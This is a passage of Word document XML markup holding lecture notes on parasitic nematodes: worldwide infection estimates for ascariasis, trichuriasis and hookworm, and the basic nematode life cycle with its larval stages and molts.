          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="377" w:lineRule="atLeast"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">A report by the World Health Organization (WHO) in 2005 stated that approximately 0.807-1.221 billion humans have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ascariasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, 604-795 million have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trichuriasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, and 576-740 million have hookworm infections worldwide.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="007F3321">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="377" w:lineRule="atLeast"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The bowel of a child living in poverty in a developing country is likely to be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>parasitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> with at least one nematode and, in many cases, multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>infection (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, whipworms, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ascaris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, and hookworms), with resultant impairments in physical, intellectual, and cognitive development.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>][</w:t>
      </w:r>
      <w:r w:rsidR="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="007F3321">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="377" w:lineRule="atLeast"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The prevalence of nematode infections throughout the world is generally increasing but varies according to levels of poverty, natural disasters and human conflicts.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="C24F1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> The spread of infection is also increasing in line with increased travel and mobility (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>eg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>angiostrongyliasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anisakiasis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">). However, some eradication </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>programmes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (notably for guinea worm disease) have been effective in reducing the burden of infection</w:t>
      </w:r>
      <w:r w:rsidR="007F3321">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="3A2E28"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Life cycle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Despite the diversity and complexity of many nematode life cycles, all of them can be related to the same basic pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This pattern is illustrated by the adjacent figure and consists of two phases,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>  parasitic</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and  pre-parasitic. The parasitic phase takes place inside the definitive host while the pre-parasitic phase occurs either as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>freeliving</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase in the external environment</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>  or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside a second host, called an  intermediate host. This basic life cycle also consists of seven stages, an egg, four larval stages (L2, L2, L3, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L4</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) and two adult stages comprising separate males and females. Sometimes the sexually immature adult stages are called L5's</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>In most species sexual reproduction by adult nematodes is the norm and occurs within an infected definitive host. Eggs are laid by the female and pass from this host into the external environment. These eggs must pass through the three developmental stages (L1, L2, and L3) before the nematode is again infective for another host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF8040"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>This is an important point to emphasize - In the vast majority of nematode life cycles the stage that passes from the definitive host is not the same stage that is infective for another definitive host. The nematode stage (usually an egg or L1) that passes from a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF8040"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>  definitive</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF8040"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> host must develop through to a stage (usually the L3)  that can then infect another host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006C65E2">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This developmental cycle can be represented by a growth curve as shown in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C65E2" w:rsidRPr="000E2510" w:rsidRDefault="006C65E2" w:rsidP="006B3C59">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>An (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L1</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) develops inside the egg, hatches (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FFB900"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>grows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> rapidly then molts (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FFB900"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M1</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) to an</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L2</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. This second stage larva also shows a rapid spurt of growth followed by a second molt (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FFB900"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>M2</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) to a third stage larva (</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FE181E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L3</w:t>
      </w:r>
      <w:r w:rsidRPr="000E2510">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
